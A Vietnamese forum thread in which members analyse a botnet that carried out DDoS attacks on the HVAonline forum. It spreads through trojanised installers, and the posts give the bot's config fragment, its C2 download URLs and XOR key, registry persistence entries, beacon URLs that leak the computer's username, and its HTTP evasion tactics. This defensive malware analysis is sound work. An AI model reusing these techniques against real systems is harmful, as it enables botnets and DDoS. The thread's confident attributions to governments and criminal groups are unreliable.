Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243938 /hvaonline/posts/list/39641.html#243938 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. loại này nó lây nhiễm qua nguồn nào(và bằng cách nào, lỗ hổng bảo mật nào?) mà số lượng đông đảo vậy? (ví dụ chương trình giả mạo unikey, nhiễm trực tiếp qua website abc.com)]]> /hvaonline/posts/list/39641.html#243943 /hvaonline/posts/list/39641.html#243943 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
STL sử dụng bot này tấn công theo hành vi duyệt web của người bình thường, thật là không đỡ được. Kĩ thuật sử dụng trong Bot này khá hay, hiện tại em chưa nghĩ ra cách gì để chống lại. Các bác admin có hướng nào để phòng trống không? Nó giả danh 1 người dùng nhé p/s: @phanledaivuong : Government nào thì không biết chứ Government của VN chắc chắn chả bao giờ làm thế. Như bản thân mình thì mình cũng không thích trang danlambaovn và chả bao giờ đọc.  
Government China bạn ạ ^^.

TQN wrote:
File config mới của tụi STL này tại host direct.aliasx.net giờ đã xoá hết các host target ở cuối file, chỉ còn lại dòng trêu chọc này: Code:
<targets>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="Postmodenism_tiep_tuc_viet_ky_su.[^.^]" port="80" uri="/" keepCookies="1" crawling="1" referer=""/>
</targets>
 
Bọn STL này hình như hết việc để làm, việc anh conmale có là Postmodenism hay không thì không ảnh hưởng đến "diễn biến hoà bình" của việt nam, cũng không như làm cho Stalin sống lại đề xâm lược được 1 loạt các nước đông âu. LOL PS: Hiện tại em đang ra quán net choi DotA, vô getdota.com download cái map 7Mb thì 1 click chuột là xong mà vào hva bằng giao thức http thì không vào được, cuối cùng dùng https thì chậm như rùa bò, chắc vẫn bị DDoS. ]]>
/hvaonline/posts/list/39641.html#243944 /hvaonline/posts/list/39641.html#243944 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
Đây là một việc cực kỳ nghiêm trọng, một mạng botnet khổng lồ được thiết lập ở Việt nam. Vậy mà chẳng cơ quan có thẩm quyền, báo chí nào lên tiếng cho bà con biết nhỉ. Thiệt là lạ quá, có chăng TQN & HVA team đang một mình chống lại thế lực với ảnh hưởng lớn, khống chế cả giới truyền thông chăng. Các ISP của Việt nam nữa, mình nghĩ là họ biết các thuê bao của họ đã bị nhiễm một loại malware dùng để tấn công DDOS, nhưng có vẻ họ không muốn lên tiếng.  
Quả là chưa thấy có ISP nào ở VN lên tiếng nhưng thật ra đã có vài anh em HVA làm việc cho một vài ISP đã ngỏ ý muốn giúp điều tra, đặc biệt là anh em làm cho FPT. Phải nói rằng con bot của STL khá "smart" bởi vì nó áp dụng một số nguyên tắc cần thiết của HTTP để tạo độ tàn phá ở mức cao nhất đó là: - Thay đổi "User-Agent" - Sử dụng keep-alive - Lưu dụng cookie để bảo trì sessions. - Crawling (như crawlers) để tạo biến thiên cho các requests. Từ thời "vecebot" một số tính năng nhận chỉ thị từ xml có khả năng thay đổi "user-agent", áp dụng chiến thuật cho cookie và referer, con bot mới này dựa trên căn bản cũ và có những khả năng mới hơn và tàn phá nhiều hơn. Tuy vậy, chính giới hạn của HTTP và những ứng dụng thêm về session khiến cho sự tàn phá vẫn bị giới hạn ở góc độ kỹ thuật.]]>
/hvaonline/posts/list/39641.html#243945 /hvaonline/posts/list/39641.html#243945 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat wrote:
Đã submit thêm lên Microsoft https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1 ------------------------------- Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là wwwect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control 
Sáng nay, thử scan lại thì không diệt được vì bản cập nhật ngày 22/07/2011. :P Nên Manual cập nhật lên bản mới ngày 23/07/2011 thì kết quả là:
He He He vậy là Microsoft Security Essentials đã kill được con này rồi. Good Job. Thank you anh TQN nhiều và admin HVA. -Chình lại tháng cho đúng, thanks latlabao! :) ]]>
/hvaonline/posts/list/39641.html#243952 /hvaonline/posts/list/39641.html#243952 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243958 /hvaonline/posts/list/39641.html#243958 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

KHUNG LONG wrote:

xnohat wrote:
Đã submit thêm lên Microsoft https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1 ------------------------------- Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là wwwect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control 
Sáng nay, thử scan lại thì không diệt được vì bản cập nhật ngày 22/11/2011. :P Nên Manual cập nhật lên bản mới ngày 23/11/2011 thì kết quả là:
He He He vậy là Microsoft Security Essentials đã kill được con này rồi. Good Job. Thank you anh TQN nhiều và admin HVA.  
Hôm nay mới 23 tháng 7 mà đã có bản cập nhật ngày 23/11 rồi à? Microsoft đúng là đi trước thời đại ;) ]]>
/hvaonline/posts/list/39641.html#243964 /hvaonline/posts/list/39641.html#243964 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Mang vào 010Editor với BmpTemplate thử xem:
À, chơi nhúng PE với BmpInfo Header mạo danh à, extract ra thử xem:
UPX à, quá dễ, upx -d xem sao. OK, không phải UPX modified, unpack ngon lành. Xem version info của nó xem sao:
Ặc ặc, lại Zlib nữa, nhưng không sao, thằng này chơi DLL nên dể RCE, nó chỉ dùng 3 hàm của zlib: gzopen, gzunxxx gì nữa vậy bà con RCE ? Nói ra anh em STL buồn, tự dưng tới giờ em thấy việc RCE "mèo què" của mấy anh là thú vui, là giải trí cho em trong lúc kinh tế khó khăn, ít việc lúc này. Và cũng để em luyện nâng cao tay nghề RCE. Có lúc em thấy khả năng RCE em còn kém quá, "nữa mùa" quá, RCE không kịp, không được 100% các mẩu "mèo què" của mấy anh được liên tục sản xuất ra !!! ;) ]]>
/hvaonline/posts/list/39641.html#243967 /hvaonline/posts/list/39641.html#243967 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. TrojanDownloader:Win32/VB.SK Encyclopedia entry Published: Jul 22, 2011 Aliases Not available Alert Level (?) Severe Antimalware protection details Microsoft recommends that you download the latest definitions to get protected. Detection initially created: Definition: 1.109.171.0 Released: Jul 22, 2011   Bạn KHUNG LONG nhầm một chút thôi mà bạn latlabao. Em đây nhiều lúc còn quên tên tháng trong tiếng Anh mà, giờ mà ai bắt em đọc từ tháng 1-12 bằng tiếng Anh là em thua (nhưng em biế July = 7 mà). Mang trả hết cho thầy cô rồi (tội nghiệp mấy thầy cô có thằng học trò như em) ! Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1]]> /hvaonline/posts/list/39641.html#243968 /hvaonline/posts/list/39641.html#243968 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. 4.5Gb đập vào hệ thống và bị /dev/null. Ngoài ra, có khoảng 53 triệu full requests ở dạng DDoS đến HVA có dung lượng 55Gb (mỗi full request có kích thước khoảng 1124 bytes bao gồm SYN, ACK và ACK PSH + HTTP data load). Hệ thống giảm DDoS từ khoảng 9 giờ tối giờ VN và giảm dần cho đến ngày hôm nay. ]]> /hvaonline/posts/list/39641.html#243981 /hvaonline/posts/list/39641.html#243981 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243983 /hvaonline/posts/list/39641.html#243983 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243988 /hvaonline/posts/list/39641.html#243988 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1 
Sau khi đọc xong thì em thấy kết nhất là cái ảnh ở đầu bài viết :-) ]]>
/hvaonline/posts/list/39641.html#244001 /hvaonline/posts/list/39641.html#244001 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

piloveyou wrote:
Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ? 
2 bác ấy không đơn độc đâu, còn có Scrutiny System của em nữa ;))]]>
/hvaonline/posts/list/39641.html#244004 /hvaonline/posts/list/39641.html#244004 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244016 /hvaonline/posts/list/39641.html#244016 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. không diệt được cái file AcrobatUpdater.exe :(. Nguyên văn trả lời của Symantec như sau :
This message is an automatically generated reply -- do not reply to this message. This system is designed to analyze and process suspicious file submissions into Symantec Security Response and cannot accept correspondence or inquiries. --------------------------------------------------------------------------- Submission Summary --------------------------------------------------------------------------- We have processed your submission (Tracking #20779850) and your submission is now closed. The following is a report of our findings for the files in your submission: File: AcrobatUpdater.exe Machine: Machine Determination: Please see the developer notes. --------------------------------------------------------------------------- Customer Notes --------------------------------------------------------------------------- This file control bonet systemn for DDOS --------------------------------------------------------------------------- Developer Notes --------------------------------------------------------------------------- AcrobatUpdater.exe Our automation was unable to identify any malicious content in this submission. The file will be stored for further human analysis --------------------------------------------------------------------------- This message was generated by Symantec Security Response automation. Should you have any questions about your submission, please contact our regional technical support from the Symantec Web site, and give them the tracking number included in this message. Symantec Technical Support 
]]>
/hvaonline/posts/list/39641.html#244023 /hvaonline/posts/list/39641.html#244023 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

piloveyou wrote:
Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ? 
1- Đâu chỉ có TQN và conmale, còn cả tôi -PXMMRF- nữa mà. Tôi cũng đã viết một số bài đấy chứ. Hì hì. Liên quan đấn STL, không chỉ có topic này mà còn những topic khác năm rải rác ở các box khác trong forum: "RCE", "Những thảo luận khác".... Ngoài ra đứng sau các HVA Admin. còn có khá nhiều Mod. và member khác. Secmac vừa qua chẳng viết một bài khá hay là gì. Có điều là TQN đã viết ra quá nhiều thông tin rất có giá trị. Chúng tôi cũng phải có thời gian để nghiền ngẫm nôi dung, mới viết bổ sung được. Vả lai cũng quá bận công viêc mưu sinh, nuôi con ăn học... nên nhiều khi phải tranh thủ thời gian. Có đêm phải thức đến 1-2 h nghiền ngẫm, khai triển những phát hiện của TQN. Tôi cũng vừa phải đi công tác Hà nôi tới hơn 1 tuần.

TQN wrote:
Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1 
2- Xác đinh nhân thân của STL là một việc tốn nhiều thời gian, công sức, phải qua nhiều năm. Không thể từ một sự kiện (event) mà tìm ra được. Những dự đoán của TQN là đúng. Sự xác định của bạn "phanledaivuong" liên quan đến STL, ở một post phía trên, cũng là đúng. Thưc ra tôi đã theo dõi các hiện tượng khá lạ (sau này chúng dường như mang tên STL) từ khi domains: pavietnam.net và pavietnam.com bị chiếm đoat quyền sử dung. Gọi là lạ, vì tôi thấy đây là một hành đông lấy cắp domain tinh vi, chuyên nghiệp, có liên quan đến một tổ chức mafia IT có trình độ cao của Nga (Russian). Có dịp tôi sẽ nói thêm về tổ chức tội phạm này. Hiện tại có những bằng chứng rõ ràng là STL vẫn còn liên quan đến tổ chức tôi phạm nói trên. Đây là một tổ chức hoạt đông rất rộng trên mạng, nhưng nó lai không có một website-server chính thức nào để có cơ sở truy tìm dấu vết. Nếu các bạn đọc kỹ các bài viết của tôi về STL (bên ngoài và trong box BQT HVA), sẽ thấy từ khá lâu tôi đã xác định chúng là ai, do ai chỉ đạo, trả tiền....Và điều này ngày càng rõ. Rõ ràng là mọi việc đều cần thời gian dài để mọi người thấy rõ. Các bạn có thể tham khảo các comment của tôi (PXMMRF-HVA và PHAM XUAN MAI) về vấn đề liên quan tại bài viết trên McAfee blog: "Vietnamese Speakers Targeted In Cyberattack" http://blogs.mcafee.com/corporate/cto/vietnamese-speakers-targeted-in-cyberattack Khi đó tôi đã xác định tác giả của W32/VulcanBot là Chinese hacker, mà cụ thể là là STL 3- Tôi đồng ý với một số nhận định trong bài viết của bạn "CHIẾN SĨ AN NINH" tại: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1 Quả thưc lưc lượng AN NINH thì làm việc vất vả, luôn phải đối phó với hiểm nguy, khá trong sạch, vì ít có cơ hôi tham nhũng. Nhưng tất nhiên cũng không phải không có một vài cá nhân, trường hợp không hay. Các trường hơp này tuy ít về số lượng, nhưng nếu có thì quy mô và tác hại lại rất lớn. Cũng có trường hợp có người giải quyết vấn đề một cách manh đông, thiếu suy nghĩ chín chắn. Tuy nhiên điều nay cơ bản là tôi đồng ý với ý kiến của bạn "CHIẾN SĨ AN NINH". Nhưng điều tôi không đồng ý là: thưc ra theo tôi "Không có bất cứ một thoả thuận nào giữa TQ và VN về hỗ trợ lẫn nhau trong an ninh và bảo vệ mạng truyền thông quốc gia". Có nhiều lý do, trong đó có lý do này. Trước các năm 80, Internet chưa có tại TQ và Việt nam. Chẳng ai lai đi bàn và ký kết các hiệp đinh liên quan đến mạng truyền thông. Sau các năm 80 thì hậu quả của các trận chiến TQ xâm lược VN năm 1979, trận chiến Trường sa 1988... rất nặng nề. Hai bên có nhiều bất đồng, chỉ "bằng mặt mà không bằng lòng", luôn luôn dò xét và canh chừng lẫn nhau. Một hiệp định quan trọng về thông tin, bảo mật như vậy rất khó được đề cập. Tôi có hỏi một vài người bạn cùng học phổ thông, nay đang đảm nhân một vài chức vụ nào đó ở lưc lương ưu tú nhất của lưc lượng AN NINH, về sự hiện diện nếu có về một hiệp định như vậy. Câu trả lời của họ là "Không-Dứt khoát là Không" 4- Về mặt Trojan, Bot thì trong một quá trình lịch sử dài STL sử dụng nhiều loai Trojan khác nhau để lấy cắp thông tin và tấn công DDoS trên mạng: từ W32/VulcaBot (vào khoảng các tháng đầu năm 2010), đến VeceBot (vào khoảng các tháng cuối năm 2010) và loại Trojan hiện nay mà anh TQN đang phân tích một cách rõ ràng và khá hay, tạm gọi là "STLBot". Các Trojan này đều có những điểm khá giống nhau và đươc cải tiến dần từ một số nguồn. Nguồn đầu tiên có lẽ là đươc viết ra từ các hacker Nga, trong tổ chức Mafia IT Nga tôi nói ở trên. Điểm giống nhau là chúng đều được "nhúng" (embedded) vào các phần mềm hay tool thông dung mà rất nhiều, hay hầu hết người Việt nam thường dùng hay phải dùng: thí dụ VPSKeys hay Vietkey2000-2002 (trường hơp W32/VulcaBot), Vietkey2007, Unikey4.x...(trường hơp Vecebot hay các STL bot sau này). Các phần mềm, tool này được đưa lên một số website VN để tiện download, trong đó có cả website đặt TQ, hoặc STL thâm nhập vào website VN (từ việc lấy cắp mật mã truy cập website) và nhúng trojan vào. Vì vậy số máy VN và nước ngoài (của bà con Việt kiều) bị nhiễm "STLBot" rất lớn Các trojan trong các máy bị nhiễm mã đôc thường xuyên, tự động liên hệ với một số website để update thông tin, cấu trúc và địa chỉ tấn công DDoS... STL sử dụng rất nhiều website loai này (tạm gọi là Master websites) và đặt ở rất nhiều nơi trên TG: Mỹ, Anh, Pháp, TQ, Việt nam..... Master website có khi chỉ là một website hosting ở webserver của một công ty dịch vụ web nào đó, có thể đặt trên một webserver riêng do chính STL quản lý (bỏ tiền ra mua, thuê), có thể là các webserver lưu động sử dụng hệ thống tên miền năng động (dynamic domain system) chạy wifi miễn phí.... STL đã tốn rất nhiều thời gian, công sức, tiền bạc (sự tốn kém đến mức kinh ngạc nếu ta thử tính toán, cộng lại các khoản chi phí) để làm việc phát tán virus, lấy cắp password email, quản lý website, blog, tấn công DDoS trên mạng, deface nhiều website... Ai tổ chức và chi tiền cho việc này. Điều này nay đã khá rõ 5- Để chống lại các cuộc tấn công DDoS trên mạng một cách hữu hiệu, điều quan trong nhất và biện pháp duy nhất trong tình hình hiện nay, theo tôi, là phải tìm mọi cách phát hiện ra các Master website chỉ huy, điều khiển mạng bot và nhanh chóng vô hiệu chúng với mọi phương tiện có thể, cần thiết. Điều trớ trêu là việc tìm ra các Master websites thưc ra lại không khó khăn gì. Chỉ cần người sử dụng máy tính (bị nhiễm bot và trở thành một zombie) biết được đia chỉ kết nối mà bot liên hệ đến, thông qua một chương trình kiểm soát thường xuyên các kết nối từ máy mình với mạng Internet, là xong. Trong khi trên mang có tới hàng trăm ngàn máy tính, hay nhiều hơn, đang bị nhiễm bot và trở thành các zombies ]]>
/hvaonline/posts/list/39641.html#244025 /hvaonline/posts/list/39641.html#244025 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Về vấn đề mẫu, thì phải xuất phát từ GoogleCrashHandle ạ. Em có mẫu ấy từ bạn xxx trên xxx, cái này chắc anh đã biết. Sau khi nghiên cứu, em viết tracker cho nó, thì tải được 1 file cũng code bằng VB sau đó không lâu, tên là Jucheck.exe. Mẫu này em có từ cái hồi xxx cơ mà. Y hệt cái AcrobatUpdater luôn, chỉ có Icon là của bạn Java Update. Chính nó tấn công vietnamnet. Mẫu này luôn truy cập để tải về file tại địa chỉ http://penop.net/top.jpg đọc code thì thấy nó giải mã với thuật toán xor theo byte, key là 0x19. nhưng ngặt nỗi hồi đó không tải được, link chết. Hệ thống botnet tracker của em thì chạy liên tục, lúc nào cũng định kì download các link, có mẫu mới là notify luôn. tơi đúng hôm HVA bị dos thì có hàng mới của top.jpg , về giải mã ra thì được cái link http://penop.net/images01.gif , đó chính là mẫu virus viết bằng VB hiện giờ đang hoành hành, cũng xor 0x19 theo byte. khi chạy , tên nó là AcrobatUpdater. Hôm đó thấy file cấu hình của nó, em đã định bảo anh ngay nhưng lại không vào HVA được Tất cả các mẫu botnet em có được, em đều đưa vào tracker của em hết, nhiều mẫu nó phải lâu lắm rồi, tưởng chết rồi, thế mà 1 ngày đẹp trời là nó sống lại và có hàng Khoe với anh: cái tracker này em viết cũng lâu rồi, nhưng chỉ để cho vui thôi ạ, nếu không em cũng chả có mẫu mới :| Đó là nguồn mẫu duy nhất của em đấy. Còn tình cờ gặp mấy cái như fake Unikey, cái đấy ăn may. đưa vào tracker mấy hôm thì thấy link die :|   Bạn trẻ này đóng vai trò quan trọng nhất trong việc dò tìm và phân tích đám malwares của STL. Tui chỉ là người phát ngôn của Bộ dò tìm STL thôi. "Tui kịch liệt lên án STL" (Giống như cô Phương Nga thôi) ;) 2 anh PXMMRF: Tại sao bây giờ VNCERT, BKAV, CMC, báo chí... vẫn im ru bà rù vậy ha ???? Chuyện gì đang xảy ra sau lưng hậu trường ????]]> /hvaonline/posts/list/39641.html#244026 /hvaonline/posts/list/39641.html#244026 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Đây là 1 phần đoạn mail của bạn trẻ cao thủ gởi cho tui. Post lên đây để anh em đọc cho vui:
Về vấn đề mẫu, thì phải xuất phát từ GoogleCrashHandle ạ. Em có mẫu ấy từ bạn xxx trên xxx, cái này chắc anh đã biết. Sau khi nghiên cứu, em viết tracker cho nó, thì tải được 1 file cũng code bằng VB sau đó không lâu, tên là Jucheck.exe. Mẫu này em có từ cái hồi xxx cơ mà. Y hệt cái AcrobatUpdater luôn, chỉ có Icon là của bạn Java Update. Chính nó tấn công vietnamnet. Mẫu này luôn truy cập để tải về file tại địa chỉ http://penop.net/top.jpg đọc code thì thấy nó giải mã với thuật toán xor theo byte, key là 0x19. nhưng ngặt nỗi hồi đó không tải được, link chết. Hệ thống botnet tracker của em thì chạy liên tục, lúc nào cũng định kì download các link, có mẫu mới là notify luôn. tơi đúng hôm HVA bị dos thì có hàng mới của top.jpg , về giải mã ra thì được cái link http://penop.net/images01.gif , đó chính là mẫu virus viết bằng VB hiện giờ đang hoành hành, cũng xor 0x19 theo byte. khi chạy , tên nó là AcrobatUpdater. Hôm đó thấy file cấu hình của nó, em đã định bảo anh ngay nhưng lại không vào HVA được Tất cả các mẫu botnet em có được, em đều đưa vào tracker của em hết, nhiều mẫu nó phải lâu lắm rồi, tưởng chết rồi, thế mà 1 ngày đẹp trời là nó sống lại và có hàng Khoe với anh: cái tracker này em viết cũng lâu rồi, nhưng chỉ để cho vui thôi ạ, nếu không em cũng chả có mẫu mới :| Đó là nguồn mẫu duy nhất của em đấy. Còn tình cờ gặp mấy cái như fake Unikey, cái đấy ăn may. đưa vào tracker mấy hôm thì thấy link die :|  
Bạn trẻ này đóng vai trò quan trọng nhất trong việc dò tìm và phân tích đám malwares của STL. Tui chỉ là người phát ngôn của Bộ dò tìm STL thôi. "Tui kịch liệt lên án STL" ;) 2 anh PXMMRF: Tại sao bây giờ VNCERT, BKAV, CMC, báo chí... vẫn im ru bà rù ???? 
Như tôi đã viết, STL dự phòng rất nhiều master websites và đặt ở nhiều nơi trên thế giới. Có thể dễ dàng thay thế các master mới khi những cái cũ bị phát hiện. Như vừa rồi khi thấy TQN phát hiện ra các master website http://penop.net/ hay http://direct.aliasx.net, thì STL lập tưc inactive (vô hiệu hoá ) chúng. Khi tôi biết thông tin của TQN, tôi check thẳng vào chúng, không cần quan ngại gì, thì website này đã inactive mất rôi. Đương nhiên các file .jpg hay btm đặt tai webroot không thể tìm thấy. Tuy nhiên scenario (kịch bản) cụ thể sẽ như sau: - STL đọc thông tin phát hiện của TQN về các master website (Không ít thành viên STL đang chăm chú đọc các bài viết của TQN, kể cả bài tôi đang viết nữa .Hì hì) - STL không inactive ngay các master website, mà duy trì chúng trong một thời gian nào đó, ngắn nhưng đủ dài để các bot update các thông tin mới về muc tiêu DDoS mới cũng như đia chỉ mới của master website (đia chỉ cũ đã lộ thì STL sẽ bỏ đi) - Do các bot tại hàng trăm ngàn zombies thường xuyên, tự động liên hệ với master website (cũ) và các kết nối ấy là persistent connection (keep-alive) nên chỉ trong một thời gian ngắn, có thể tối đa là 60 sec (với IE 6-7-8) hay 115 sec (với FireFox4-5) hay hơn một chút là trình duyệt của máy zombies đã giúp bot update được các thông tin mới về Master websites (tên miền, IP address). Muc tiêu tấn công DDoS có thể STL không cần thay đổi, như trường hợp HVA vừa rồi. - Sau đó thì STL mới chính thức thay đổi Master website Ta hình dung có một cuộc chay đua giữa HVA (TQN-conmale) và STL trong chuyện này. TQN phát hiện master website, STL thay đổi master website, TQN lai phát hiện...vv. Nhưng tôi tin rằng lão conmale tuy già cả nhưng thường vẫn chạy nhanh hơn. Hì hì ------------ VNCERT: Biên chế ít, nên chỉ có thể quản lý mạng theo kiểu hành chính thôi BKAV: Đang tập trung vào diệt virus nên có thể không tập trung vào RCE kỹ lưỡng và với mục đích như TQN. Vả lại theo tôi họ không giỏi RCE như TQN. CMC: do bác Triệu trần Đức, Admin cũ của HVA, là TGD. Họ đang rất quan tâm đến các bài viết về Trojan của STL và đang viết các DAT file diệt các Trojan này. Nói chung, theo tôi họ rất tán đồng và ủng hộ HVA Báo chí: Đến ta (HVA) mà phải tốn nhiều thời gian, công sức và phải có kiến thức sâu về RCE thì mới discover được đám Bot của STL, thì cánh báo chí sao làm được, biết được. Nhưng chắc họ cũng phải còn nghe ngóng, tìm hiểu thông tin thêm chứ, rồi mới viết bài. Cũng còn một đôi vấn đề chính chúng ta (HVA) cũng còn chưa hoàn toàn thống nhất cơ mà. ]]>
/hvaonline/posts/list/39641.html#244027 /hvaonline/posts/list/39641.html#244027 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244028 /hvaonline/posts/list/39641.html#244028 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244030 /hvaonline/posts/list/39641.html#244030 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

LlyKil wrote:
Chào mọi người, Tính chất cũng như kĩ thuật tấn công đã được nêu rõ, hy vọng biện pháp phòng thủ sẽ là chủ đề kế tiếp thay vì cứ bàn những vấn đề rời rạc khác. Đó mới là mục đích chính và cũng là phần thú vị (nếu RCE thì có thể "up" cái topic của bạn TQN lên tránh lạc đề :P).  
Cám ơn LlyKil đã liên lạc và có một số góp ý hữu ích. Sẵn tham gia trả lời chủ đề này anh hồi âm em luôn là obscurity cũng là một biện pháp trong nhiều biện pháp bảo mật. Đi xa hơn nữa, thật và ảo xen lẫn nhau lại càng có tác dụng hơn :). @ piloveyou: thật ra có rất nhiều anh em HVA nhiệt tình góp ý và đã rất năng động trong việc xử lý zombies trong giới hạn họ quản lý. TQN, conmale, PXMMRF, acoustics89.... chỉ là một số người năng động tham gia phân tích và gởi bài chính thức trên diễn đàn nhưng đằng sau đó, có rất nhiều người đã giúp đỡ và hỗ trợ một cách thầm lặng. Đây là điều đáng mừng vì hầu hết chẳng ai chấp nhận những trò phá hoại một cách bỉ ổi và hèn hạ. Báo chí VN thì chỉ cầm chừng và cái gì có lợi thì mới làm. Ai hơi đâu mà đăng báo mãi về một diễn đàn HVA vớ vẩn nào đó bị DDoS? :-) . Chuyện quan trọng là một cơ chế cảnh báo hiểm hoạ malware và DDoS một cách rộng rãi và hữu hiệu (vẫn chưa có).]]>
/hvaonline/posts/list/39641.html#244032 /hvaonline/posts/list/39641.html#244032 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244034 /hvaonline/posts/list/39641.html#244034 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. 1. Tạo ra: C:\Program Files\Adobe\Updater6 [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe 2. Điều chỉnh registry: - Với key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ CURRENT ], New Value: [ 2011-07-20 16:28:52 ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ DATA ], New Value: [ 0x5d4c3c3d3f4b572501120204081e0371454349440e5f514c24484d550e13 ] Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi. Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? Hãy gác qua chuyện tạo máy con làm zombies để DDoS mà hãy hình dung xem, hàng trăm ngàn máy con bị điều khiển, bị đánh cắp thông tin (có thể có cả những máy có thông tin quan trọng bởi vì trong danh sách IP tấn công HVA có cả những IP thuộc các ban ngành của chính phủ). Liệu đây là chuyện có thể xem nhẹ và làm ngơ?]]> /hvaonline/posts/list/39641.html#244035 /hvaonline/posts/list/39641.html#244035 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244036 /hvaonline/posts/list/39641.html#244036 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244037 /hvaonline/posts/list/39641.html#244037 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 wrote:
Theo như sự phân tích ở trên thì các vụ tấn công Ddos đều giả các cuộc lức wed bình thường nhưng dù gì thì máy tính vẫn là máy tính nó không có trí thông minh bằng người chế tạo ra nó được nó cũng chỉ làm theo những dòng code có sẵn. dựa vào sự suy nghĩ trên em nghĩ ra được 1 cách không biết có được không nếu có gì sai xin các bác bỏ qua cho em . dừng chém em tội nghiệp em lắm :) : =>Tại sau chúng ta không phân biệt sự truy cập đó là người hay là máy bằng cách đưa ra các câu hỏi (như 10+5 = ? hoặc đưa ra một từ tiếng anh mất 1 chữ và nghĩa tiếng việt của nó để ta điền vào ...) để người nào muốn truy cập vào một trang bất kì của HVA cũng phải giải nó.  
Đến lúc đống zombie đó kết nối được đến tầng này thì chắc server nào bị dội cũng sụm bà chè rồi. Hehe Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):
http://tongfeirou.dyndns-web.com/banner1.png?cpn=<COMPUTER USERNAME> (404) https://biouzhen.dyndns-server.com/banner1.png?cpn=<COMPUTER USERNAME> (403 nginx)  
với User-Agent đều là:
Gozilla_2/General (??) 
Đang tiếp tục vọc tiếp ...]]>
/hvaonline/posts/list/39641.html#244040 /hvaonline/posts/list/39641.html#244040 GMT
